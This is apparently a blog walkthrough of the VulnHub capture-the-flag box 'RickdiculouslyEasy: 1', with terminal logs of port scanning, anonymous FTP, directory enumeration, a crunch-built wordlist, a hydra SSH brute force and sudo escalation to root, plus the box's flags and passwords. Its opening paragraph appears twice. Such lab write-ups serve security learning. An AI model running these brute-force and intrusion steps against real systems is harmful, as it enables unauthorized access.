Fourth Boot2Root RickdiculouslyEasy: 1
Hello Folks!
Link to the box :- https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
Rating :- Intermediate
Time :- 3 Hours
Welcome to the Forth Boot2Root as always we start with arp-scan -l found the box at 192.168.43.27
and nmap the box, this time i had to do an entire -p- scan because the SSH wasn't working on the port 22 it kept on giving connection refused so I had to do nmap -p- 192.168.43.27
so the nmap scan returned this :-
After this part I decided to visit the FTP
the anonymous worked and blank in password we got the first flag pretty easy so far so that 10/130 for total points
moving on to the port 80 i found this
time to visit the /password directory it looks really something we can use with set of usernames we have
so total score becomes (100/130)
Link to the box :- https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
Rating :- Intermediate
Time :- 3 Hours
Welcome to the Forth Boot2Root as always we start with arp-scan -l found the box at 192.168.43.27
and nmap the box, this time i had to do an entire -p- scan because the SSH wasn't working on the port 22 it kept on giving connection refused so I had to do nmap -p- 192.168.43.27
so the nmap scan returned this :-
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 21/tcp open ftp | |
| 22/tcp open ssh | |
| 80/tcp open http | |
| 9090/tcp open zeus-admin | |
| 13337/tcp open unknown | |
| 22222/tcp open easyengine | |
| 60000/tcp open unknown |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# ftp 192.168.43.27 | |
| Connected to 192.168.43.27. | |
| 220 (vsFTPd 3.0.3) | |
| Name (192.168.43.27:root): anonymous | |
| 331 Please specify the password. | |
| Password: | |
| 230 Login successful. | |
| Remote system type is UNIX. | |
| Using binary mode to transfer files. | |
| ftp> get FLAG.txt | |
| local: FLAG.txt remote: FLAG.txt | |
| 200 PORT command successful. Consider using PASV. | |
| 150 Opening BINARY mode data connection for FLAG.txt (42 bytes). | |
| 226 Transfer complete. | |
| 42 bytes received in 0.03 secs (1.6210 kB/s) | |
| ftp> bye | |
| 221 Goodbye. | |
| root@localhost:~# cat FLAG.txt | |
| FLAG{Whoa this is unexpected} - 10 Points |
moving on to the port 80 i found this
nothing hiding in the source code plain and simple HTTP so as always i planned to visit the /robots.txt and see if that exist once i opened /robots.txt
that cgi-bin was really tempting me to try the shellshock without thinking too much but i decided to visit all the links from top down
first link was a troll as expected nobody gives out root shell info that easy xP
time to check out the second link maybe it'll be something we can use?
well well what do i know i tried a simple command line injection and it revealed a bunch of information so now we know there's 3 users "Morty/Summer/RickSanchez" we can use it to ssh maybe?
moving on to the last link was useless, so i planned to dirb for something useful maybe?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# dirb http://192.168.43.27 | |
| ----------------- | |
| DIRB v2.22 | |
| By The Dark Raver | |
| ----------------- | |
| START_TIME: Thu Oct 12 17:50:08 2017 | |
| URL_BASE: http://192.168.43.27/ | |
| WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt | |
| ----------------- | |
| GENERATED WORDS: 4612 | |
| ---- Scanning URL: http://192.168.43.27/ ---- | |
| + http://192.168.43.27/cgi-bin/ (CODE:403|SIZE:217) | |
| + http://192.168.43.27/index.html (CODE:200|SIZE:326) | |
| ==> DIRECTORY: http://192.168.43.27/passwords/ | |
| + http://192.168.43.27/robots.txt (CODE:200|SIZE:126) | |
| ---- Entering directory: http://192.168.43.27/passwords/ ---- | |
| (!) WARNING: Directory IS LISTABLE. No need to scan it. | |
| (Use mode '-w' if you want to scan it anyway) | |
| ----------------- | |
| END_TIME: Thu Oct 12 17:50:09 2017 | |
| DOWNLOADED: 4612 - FOUND: 3 |
There we go with a password and a username "Summer and winter" sounds like something we can use together?
so that's total of 2 flags (20/130) getting there i guess now i planned to visit the zeus-admin page to see if i can find anything useful
so that adds up to (30/130) which is pretty cool now after this I started checking the open ports which we got from out nmap scan and i found few flags
so after scanning all the ports we came to know there's a ssh on 22222 and found two more flag that totals up to (50/130)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# nc -nv 192.168.43.27 13337 | |
| (UNKNOWN) [192.168.43.27] 13337 (?) open | |
| FLAG:{TheyFoundMyBackDoorMorty}-10Points | |
| root@localhost:~# nc -nv 192.168.43.27 22222 | |
| (UNKNOWN) [192.168.43.27] 22222 (?) open | |
| SSH-2.0-OpenSSH_7.5 | |
| ^C | |
| root@localhost:~# nc -nv 192.168.43.27 60000 | |
| (UNKNOWN) [192.168.43.27] 60000 (?) open | |
| Welcome to Ricks half baked reverse shell... | |
| # ls | |
| FLAG.txt | |
| # less FLAG.txt | |
| less FLAG.txt: command not found | |
| # cat FLAG.txt | |
| FLAG{Flip the pickle Morty!} - 10 Points | |
| # | |
Let's get to the SSH then
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# ssh Summer@192.168.43.27 -p 22222 | |
| Summer@192.168.43.27's password: | |
| Last login: Thu Oct 12 21:52:39 2017 from 192.168.43.71 | |
| [Summer@localhost ~]$ ls | |
| FLAG.txt | |
| [Summer@localhost ~]$ less FLAG.txt | |
| [Summer@localhost ~]$ FLAG{Get off the high road Summer!} - 10 Points^C | |
| [Summer@localhost ~]$ | |
so once we are done with this flag i planned to visit the /home and found this
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Summer@localhost ~]$ cd /home | |
| [Summer@localhost home]$ ls | |
| Morty RickSanchez Summer | |
| [Summer@localhost home]$ cd Morty | |
| [Summer@localhost Morty]$ ls | |
| journal.txt.zip Safe_Password.jpg | |
| [Summer@localhost Morty]$ exit | |
| logout | |
| Connection to 192.168.43.27 closed. | |
| root@localhost:~# |
Time to copy these files to the local host and enumerate the files further for some more clue
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# scp -P 22222 Summer@192.168.43.27:/home/Morty/Safe_Password.jpg /root/Desktop/VulnHub | |
| Summer@192.168.43.27's password: | |
| Safe_Password.jpg 100% 42KB 3.8MB/s 00:00 | |
| root@localhost:~# scp -P 22222 Summer@192.168.43.27:/home/Morty/journal.txt.zip /root/Desktop/VulnHub | |
| Summer@192.168.43.27's password: | |
| journal.txt.zip 100% 414 13.0KB/s 00:00 | |
| root@localhost:~# cd Desktop/VulnHub | |
| root@localhost:~/Desktop/VulnHub# ls | |
| journal.txt.zip Rickd Safe_Password.jpg |
so once i copied them in I decided to run strings on the file and see if i can find anything in there
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~/Desktop/VulnHub/Rickd# strings Safe_Password.jpg | |
| JFIF | |
| Exif | |
| 8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek | |
| 8BIM | |
| 8BIM | |
| $3br | |
| %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz |
so with the password "Meeseek" i was able to open the zip file and further found this
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe? | |
| Anyway. Here it is: | |
| FLAG: {131333} - 20 Points |
so we found the next flag now so that's total (80/130) after reading the hint for safe i came up with the idea to visit the ssh again and see if we can find something inside the Sanchez directory
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# ssh Summer@192.168.43.27 -p 22222 | |
| Summer@192.168.43.27's password: | |
| Last login: Thu Oct 12 23:35:03 2017 from 192.168.43.71 | |
| [Summer@localhost ~]$ ls | |
| FLAG.txt | |
| [Summer@localhost ~]$ cd /home | |
| [Summer@localhost home]$ ls | |
| Morty RickSanchez Summer | |
| [Summer@localhost home]$ cd RickSanchez | |
| [Summer@localhost RickSanchez]$ ls | |
| RICKS_SAFE ThisDoesntContainAnyFlags | |
| [Summer@localhost RickSanchez]$ cd RICKS_SAFE | |
| [Summer@localhost RICKS_SAFE]$ ls | |
| safe | |
| [Summer@localhost RICKS_SAFE]$ |
Back to ssh
time to copy that file and see if we can use the 131333 to our strength as a password and open this safe file?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~/Desktop/VulnHub# ./safe | |
| Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS! | |
| root@localhost:~/Desktop/VulnHub# ./safe 131333 | |
| decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points | |
| Ricks password hints: | |
| (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.) | |
| Follow these clues, in order | |
| 1 uppercase character | |
| 1 digit | |
| One of the words in my old bands name.� @ |
After a little bit of google i came to know Sanchez band was "The Flesh Curtains"
so i decided to make a password list using crunch and bruteforce the SSH for Sanchez
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~/del# crunch 10 10 -t ,%Curtains -o ./worlist.curtains | |
| Crunch will now generate the following amount of data: 2860 bytes | |
| 0 MB | |
| 0 GB | |
| 0 TB | |
| 0 PB | |
| Crunch will now generate the following number of lines: 260 | |
| crunch: 100% completed generating output | |
| root@localhost:~/del# crunch 7 7 -t ,%Flesh -o ./worlist.flesh | |
| Crunch will now generate the following amount of data: 2080 bytes | |
| 0 MB | |
| 0 GB | |
| 0 TB | |
| 0 PB | |
| Crunch will now generate the following number of lines: 260 | |
| crunch: 100% completed generating output | |
| root@localhost:~# cat worlist.curtains >WL | |
| root@localhost:~# cat worlist.flesh >> WL | |
| root@localhost:~/del# cat WL| wc -l | |
| 520 | |
so with everything ready let's bruteforce the SSH with hydra
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# hydra -l RickSanchez -P WL ssh://192.168.56.102 -s 22222 | |
| Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. | |
| Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-05 09:19:08 | |
| [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 | |
| [DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task | |
| [DATA] attacking ssh://192.168.56.102:22222/ | |
| [22222][ssh] host: 192.168.56.102 login: RickSanchez password: P7Curtains | |
| 1 of 1 target successfully completed, 1 valid password found | |
| [WARNING] Writing restore file because 5 final worker threads did not complete until end. | |
| [ERROR] 5 targets did not resolve or could not be connected | |
| [ERROR] 16 targets did not complete | |
| Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-05 09:19:39 |
We found the user and password is (RickSanchez:P7Curtains) let's SSH with the following information and see if we can get the final flag we also found in the safe file that sudo is wheely good so i did "Sudo -i" and entered the password and found this
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@localhost:~# ssh RickSanchez@192.168.43.27 -p 22222 | |
| RickSanchez@192.168.43.27's password: | |
| Last login: Thu Oct 12 22:17:45 2017 from 192.168.43.71 | |
| [RickSanchez@localhost ~]$ ls | |
| RICKS_SAFE ThisDoesntContainAnyFlags | |
| [RickSanchez@localhost ~]$ sudo -i | |
| [sudo] password for RickSanchez: | |
| [root@localhost ~]# ls | |
| anaconda-ks.cfg FLAG.txt | |
| [root@localhost ~]# less FLAG.txt | |
| [root@localhost ~]# FLAG: {Ionic Defibrillator} - 30 points |
AND it's a wrap 130/130 simply amazing box not really "easy"
Thank You!!
Comments
Post a Comment